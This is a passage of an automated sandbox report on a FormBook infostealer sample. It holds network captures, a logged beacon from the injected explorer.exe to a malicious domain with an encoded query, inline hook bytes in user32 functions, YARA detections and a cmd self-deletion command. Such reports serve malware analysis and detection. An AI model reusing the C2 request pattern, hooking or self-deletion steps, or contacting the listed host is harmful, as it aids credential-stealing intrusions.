                                                  Jul 22, 2021 14:06:04.143454075 CEST80497565.79.68.101192.168.2.6
                                                  Jul 22, 2021 14:06:04.148179054 CEST4975680192.168.2.65.79.68.101
                                                  Jul 22, 2021 14:06:04.151316881 CEST4975680192.168.2.65.79.68.101
                                                  Jul 22, 2021 14:06:04.204042912 CEST80497565.79.68.101192.168.2.6
                                                  Jul 22, 2021 14:06:04.422022104 CEST80497565.79.68.101192.168.2.6
                                                  Jul 22, 2021 14:06:04.422064066 CEST80497565.79.68.101192.168.2.6
                                                  Jul 22, 2021 14:06:04.423897982 CEST4975680192.168.2.65.79.68.101
                                                  Jul 22, 2021 14:06:04.838402987 CEST4975680192.168.2.65.79.68.101
                                                  Jul 22, 2021 14:06:04.893755913 CEST80497565.79.68.101192.168.2.6

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 22, 2021 14:03:59.303673983 CEST4944853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:03:59.355784893 CEST53494488.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:00.052105904 CEST6034253192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:00.111004114 CEST53603428.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:00.765125036 CEST6134653192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:00.822240114 CEST53613468.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:02.094609976 CEST5177453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:02.147171974 CEST53517748.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:09.431667089 CEST5602353192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:09.481044054 CEST53560238.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:10.378149986 CEST5838453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:10.430361032 CEST53583848.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:11.425858974 CEST6026153192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:11.475346088 CEST53602618.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:12.473227978 CEST5606153192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:12.522262096 CEST53560618.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:13.484980106 CEST5833653192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:13.545129061 CEST53583368.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:14.503341913 CEST5378153192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:14.555308104 CEST53537818.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:26.808278084 CEST5406453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:26.857717991 CEST53540648.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:28.077316999 CEST5281153192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:28.134593010 CEST53528118.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:29.371144056 CEST5529953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:29.420710087 CEST53552998.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:30.351950884 CEST6374553192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:30.410202980 CEST53637458.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:31.313930035 CEST5005553192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:31.366473913 CEST53500558.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:32.271615982 CEST6137453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:32.322807074 CEST53613748.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:33.220000982 CEST5033953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:33.277976036 CEST53503398.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:34.482686996 CEST6330753192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:34.532984972 CEST4969453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:34.536429882 CEST53633078.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:34.591289997 CEST53496948.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:35.406158924 CEST5498253192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:35.458136082 CEST53549828.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:51.542419910 CEST5001053192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:51.606914997 CEST53500108.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:52.410365105 CEST6371853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:52.470299006 CEST53637188.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:52.915169001 CEST6211653192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:52.981604099 CEST53621168.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:53.353132010 CEST6381653192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:53.413219929 CEST53638168.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:54.006211996 CEST5501453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:54.063257933 CEST53550148.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:55.116362095 CEST6220853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:55.176175117 CEST53622088.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:56.242101908 CEST5757453192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:56.302273035 CEST53575748.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:57.114556074 CEST5181853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:57.171421051 CEST53518188.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:04:58.783549070 CEST5662853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:04:58.841667891 CEST53566288.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:00.270380974 CEST6077853192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:00.351170063 CEST53607788.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:01.065941095 CEST5379953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:01.125777960 CEST53537998.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:10.134098053 CEST5468353192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:10.191088915 CEST53546838.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:12.012016058 CEST5932953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:12.082309961 CEST53593298.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:14.577866077 CEST6402153192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:14.636253119 CEST53640218.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:37.715763092 CEST5612953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:37.779145002 CEST53561298.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:47.433326960 CEST5817753192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:47.503354073 CEST53581778.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:05:51.776977062 CEST5070053192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:05:51.842499971 CEST53507008.8.8.8192.168.2.6
                                                  Jul 22, 2021 14:06:03.988888025 CEST5406953192.168.2.68.8.8.8
                                                  Jul 22, 2021 14:06:04.056725025 CEST53540698.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jul 22, 2021 14:06:03.988888025 CEST192.168.2.68.8.8.80xe24eStandard query (0)www.driplockerstore.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jul 22, 2021 14:06:04.056725025 CEST8.8.8.8192.168.2.60xe24eNo error (0)www.driplockerstore.com5.79.68.101A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.driplockerstore.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.6497565.79.68.10180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jul 22, 2021 14:06:04.151316881 CEST6041OUTGET /np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw== HTTP/1.1
                                                  Host: www.driplockerstore.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 22, 2021 14:06:04.422022104 CEST6041INHTTP/1.1 302 Found
                                                  cache-control: max-age=0, private, must-revalidate
                                                  connection: close
                                                  content-length: 11
                                                  date: Thu, 22 Jul 2021 12:06:04 GMT
                                                  location: http://survey-smiles.com
                                                  server: nginx
                                                  set-cookie: sid=3031d498-eae5-11eb-88ed-6c71e7fd75df; path=/; domain=.driplockerstore.com; expires=Tue, 09 Aug 2089 15:20:11 GMT; max-age=2147483647; HttpOnly
                                                  Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                  Data Ascii: Redirecting


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEB
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEB
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEB
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEB

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:14:04:05
                                                  Start date:22/07/2021
                                                  Path:C:\Users\user\Desktop\9thuIDnsFV.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\9thuIDnsFV.exe'
                                                  Imagebase:0xe80000
                                                  File size:648912 bytes
                                                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:14:04:50
                                                  Start date:22/07/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
                                                  Imagebase:0xf40000
                                                  File size:648912 bytes
                                                  MD5 hash:0E715DB2198FF670F4BF0E88E0E9B547
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 24%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:14:04:52
                                                  Start date:22/07/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff6f22f0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:14:05:19
                                                  Start date:22/07/2021
                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                  Imagebase:0x2b0000
                                                  File size:78848 bytes
                                                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:14:05:26
                                                  Start date:22/07/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:14:05:27
                                                  Start date:22/07/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >